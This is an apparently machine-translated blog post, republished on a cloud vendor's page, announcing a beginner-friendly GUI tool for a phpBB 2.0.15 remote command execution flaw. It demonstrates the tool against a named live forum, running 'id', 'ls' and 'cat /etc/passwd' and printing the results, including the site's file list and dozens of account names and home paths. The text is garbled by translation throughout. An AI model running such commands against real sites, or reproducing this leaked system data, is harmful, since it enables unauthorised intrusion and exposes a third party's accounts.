PHPbb2.0.15 remote command execution vulnerability exploitation Program

Source: Internet
Author: User
Tags gopher cpanel

The annoying little semester is over, and you can see <PHPbb2.0.15 remote command execution vulnerability test rewrite note>, now you are free, I also wrote a GUI version of the exploitation program for this vulnerability, which is suitable for cainiao. the program basically implements logging.
Test:
Forum Url: http://www.tuoitho.net/diendan/
Topic ID: 15218 Command: id
Data Received ed: uid = 99 (nobody) gid = 99 (nobody) groups = 99 (nobody)

Of course, we can use another command, such as entering ls to return:

_ Makepagelink. php
_New_register.txt
_News.txt
Admin
Bank_index.php
Cache
Chat_popup.js
Common. php
Config. php
Db
Ecards
Extension. inc
Faq. php
Flashgame
Forum. php
Gallery
Groupcp. php
Images
Includes
Index. php
Language
Login. php
Memberlist. php
Modcp. php
Photo
Posting. php
Privmsg. php
Profile. php
Realmusic. php
Search. php
Streammedia. php
Templates
Tt_images
Tt_temp
Ttd_news.php
Vietuni8.js
Viewforum. php
Viewonline. php
Viewtopic. php
Ysi.htm
Ysi. php

Enter cat/etc/passwd and return:

Root: x: 0: 0: root:/bin/bash
Bin: x: 1: 1: bin:/sbin/nologin
Daemon: x: 2: 2: daemon:/sbin/nologin
Adm: x: 3: 4: adm:/var/adm:/sbin/nologin
Lp: x: 4: 7: lp:/var/spool/lpd:/sbin/nologin
Sync: x: 5: 0: sync:/sbin:/bin/sync
Shutdown: x: 6: 0: shutdown:/sbin/shutdown
Halt: x: 7: 0: halt:/sbin/halt
Mail: x: 8: 12: mail:/var/spool/mail:/sbin/nologin
News: x: 9: 13: news:/etc/news:
Uucp: x: 10: 14: uucp:/var/spool/uucp:/sbin/nologin
Operator: x: 11: 0: operator:/root:/sbin/nologin
Games: x: 12: 100: games:/usr/games:/sbin/nologin
Gopher: x: 13: 30: gopher:/var/gopher:/sbin/nologin
Ftp: x: 14: 50: FTP User:/var/ftp:/sbin/nologin
Nobody: x: 99: 99: Nobody: // sbin/nologin
Vcsa: x: 69: 69: virtual console memory owner:/dev:/sbin/nologin
Rpm: x: 37: 37:/var/lib/rpm:/sbin/nologin
Nscd: x: 28: 28: NSCD Daemon: // sbin/nologin
Ident: x: 100: 101:/home/ident:/sbin/nologin
Netdump: x: 34: 34: Network Crash Dump user:/var/crash:/bin/bash
Sshd: x: 74: 74: Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
Rpc: x: 32: 32: Portmapper RPC user: // sbin/nologin
Pcap: x: 77: 77:/var/arpwatch:/sbin/nologin
Xfs: x: 43: 43: X Font Server:/etc/X11/fs:/sbin/nologin
Wnn: x: 49: 49: Wnn Input Server:/var/lib/wnn:/sbin/nologin
Named: x: 25: 25: Named:/var/named:/sbin/nologin
Mysql: x: 101: 102: MySQL server:/var/lib/mysql:/bin/bash
Mailnull: x: 47: 47: Exim:/var/spool/mqueue:/bin/false
Cpanel: x: 32001: 502:/usr/local/cpanel:/bin/bash
Mailman: x: 32002: 503:/usr/local/cpanel/3 rdparty/mailman:/bin/bash
Ltsv-1990: x: 32003: 32003:/home/ltsv-1990:/bin/bash
Ttnet: x: 32004: 504:/home/ttnet:/bin/bash
Ttmail: x: 32005: 505:/home/ttmail:/usr/local/cpanel/bin/noshell
Doicongl: x: 32006: 506:/home/doicongl:/usr/local/cpanel/bin/noshell
Realmsof: x: 32007: 507:/home/realmsof:/usr/local/cpanel/bin/noshell
Trpanoco: x: 32009: 509:/home/trpanoco:/usr/local/cpanel/bin/noshell
Qua: x: 32008: 508:/home/qua:/usr/local/cpanel/bin/noshell
Key: x: 32010: 510:/home/key:/usr/local/cpanel/bin/noshell
Cuop: x: 32011: 511:/home/cuop:/usr/local/cpanel/bin/noshell
Bluewebp: x: 32012: 512:/home/bluewebp:/usr/local/cpanel/bin/noshell
Shuffled: x: 32013: 513:/home/shugoten:/usr/local/cpanel/bin/noshell
Afghansa: x: 32014: 514:/home/afghansa:/usr/local/cpanel/bin/noshell
Polishtr: x: 32015: 515:/home/polishtr:/usr/local/cpanel/bin/noshell
Gioitrec: x: 32016: 516:/home/gioitrec:/usr/local/cpanel/bin/noshell
Colorado: x: 32017: 517:/home/colorado:/usr/local/cpanel/bin/noshell
Wannabel: x: 32018: 518:/home/wannabel:/usr/local/cpanel/bin/noshell
Cactuslo: x: 32019: 519:/home/cactuslo:/usr/local/cpanel/bin/noshell
Aznphoto: x: 32020: 520:/home/aznphoto:/bin/bash
Journeyo: x: 32021: 521:/home/journeyo:/usr/local/cpanel/bin/noshell
Chiroupa: x: 32022: 522:/home/chiroupa:/usr/local/cpanel/bin/noshell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.